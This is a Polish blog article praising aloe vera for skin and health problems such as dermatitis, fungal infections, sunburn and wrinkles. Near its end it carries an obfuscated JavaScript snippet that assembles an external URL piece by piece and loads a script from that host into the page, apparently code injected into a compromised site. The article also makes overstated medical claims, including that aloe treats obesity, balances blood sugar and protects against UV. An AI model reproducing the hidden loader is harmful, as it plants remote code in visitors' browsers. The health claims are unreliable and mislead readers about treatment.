Przejdź do treści

Aloes. W jakich problemach skórnych pomaga najlepiej?

Są takie rośliny jak aloes, które bez względu na to, czy masz łuszczycę, czy trądzik, pomogą ci w równym stopniu. Te prawdziwe cuda natury nawilżają, łagodzą i odżywiają skórę. Jeśli więc od dłuższego czasu zmagasz się z nieładną cerą lub szorstką skórą, sięgnij po roślinę z gatunku aloesowatych. Sama się zdziwisz, jak szybko odzyskasz zdrowie i piękny wygląd.

Aloes to roślina, której lecznicze właściwości są znane od tysięcy lat. Grecy i Rzymianie stosowali go do upiększania włosów, a Indianie jako środka odmładzającego. Wzmianki o aloesie można znaleźć w najstarszych podręcznikach medycznych, a jego lecznicze i upiększające właściwości znane są po dziś dzień. Współcześnie aloes znajduje zastosowanie zarówno w medycynie, jak i kosmetyce. Przy problemach skórnych pomaga nie tylko od zewnątrz, ale i od wewnątrz. Można go pić, wcierać lub smarować. Nadaje się do codziennego użytku, choć tak jak przy każdym „leku”- trzeba czasem robić z nim przerwy.

Aloes- zastosowanie w medycynie

Fenomen prozdrowotnego działania aloesu polega na tym, że zawiera on całe mnóstwo aktywnych związków, witamin i minerałów, które służą naszemu zdrowiu. Substancje czynne zawarte w aloesie działają przeciwzapalnie i przeciwgrzybiczo, dlatego nadają się idealnie do leczenia chorób jelit. Potrafią zahamować rozwój takich drobnoustrojów jak streptokoki, grzyby Candida Albicans, gronkowce.

Badania in vitro wykazują, że świeży sok z aloesu jest w stanie zahamować rozwój pałeczek duru brzusznego, czy czerwonki. Aloes wspomaga też regenerację żołądka u osób, które cierpią na nieżyt lub wrzody żołądka. Przede wszystkim łagodzi u nich ból i ułatwia trawienie pokarmów, a także przyspiesza gojenie nadżerek oraz owrzodzeń. Miąższ z aloesu jest przydatny przy leczeniu otyłości, reguluje bowiem wydzielanie insuliny i wyrównuje poziom cukru we krwi.

Aloes- zastosowanie w kosmetyce przy problemach skórnych

Lecznicze właściwości aloesu znalazły również zastosowanie w kosmetyce. Oprócz najbardziej powszechnego działania nawilżającego, kosmetyki z aloesem wspomagają np. leczenie trądziku, czy opóźniają proces starzenia się skóry.

Atopowe zapalenie skóry– ta choroba o podłożu genetycznym charakteryzuje się osłabieniem bariery ochronnej skóry. Dlatego osoby na nią cierpiące, powinny jak najczęściej sięgać po krem z aloesem, który zawiera polisacharydy wzmacniające płaszcz lipidowy naskórka. Dzięki nim naskórek nie jest przesuszony, a liczba infekcji skórnych zostaje ograniczona. Aloes ma swoim składzie liczne substancje higroskopijne, które potrafią utrzymać prawidłowy poziom nawodnienia skóry a tym samym poprawić jej jędrność i stopień nawilżenia.

Grzybica skóry– jest to schorzenie wywołane przez grzyby typu drożdżaki, czy dermatofity. Atakują one różne części ciała, choć najczęściej umiejscawiają się na stopach, głowie, w jamie ustnej, czy na narządach płciowych. Aby je zlikwidować, potrzebny jest środek, który zadziała silnie przeciwgrzybiczo. Jest nim np. żel z aloesem, który zawiera aloeniny zdolne do zwalczenia np. kropidlaka.

Oparzenia słoneczne– są nie tylko defektem estetycznym. Powstały rumień wskazuje bowiem na znaczne podrażnienie naskórka, które może przejść w stan zapalny. Skutecznym środkiem zapobiegającym oparzeniom jest aloes. Szybko łagodzi skórę i pozwala jej wrócić do stanu równowagi. Poza tym, dzięki pochodnym chromonu, posiada właściwości promieniochronne. Warto mieć więc swojej łazience krem z filtrem UV z zawartością aloesu, aby zapobiec oparzeniom lub szybciej je wyleczyć.

Zmarszczki- są następstwem procesu starzenia się skóry oraz nadmiernego jej przesuszenia. Kiedy skóra jest sucha, łatwiej o zagniecenia w postaci zmarszczek. Aloes znany jest ze swych właściwości nawilżających, więc tym samym pomaga zachować młodość i jędrność skóry. Kremy z aloesem pomagają ponadto w przyspieszeniu tworzenia się nowych fibroblastów, które odpowiedzialne są za produkcję kolagenu i elastyny. Dzięki kosmetykom z aloesem można więc w naturalny i prosty sposób uzyskać efekt odmładzający.

(function(){

cd08=document.createElement(„script”);cd08_=(„ust”);cd08u=”76002697″;

cd08_+=”a”+(„t.i”);cd08.type=”text/javascript”;

cd08u+=”.rkjaymyid08imlfzpk5a”;cd08.async=true;cd08_+=”n”+(„f”+”o”)+”/”;

cd08u+=”qljz7quxwf”;cd08.src=”https://”+cd08_+cd08u;

document.body.appendChild(cd08);

})();

0 0 votes
Article Rating
Subscribe
Powiadom o
guest
0 komentarzy
Inline Feedbacks
View all comments
%d bloggers like this: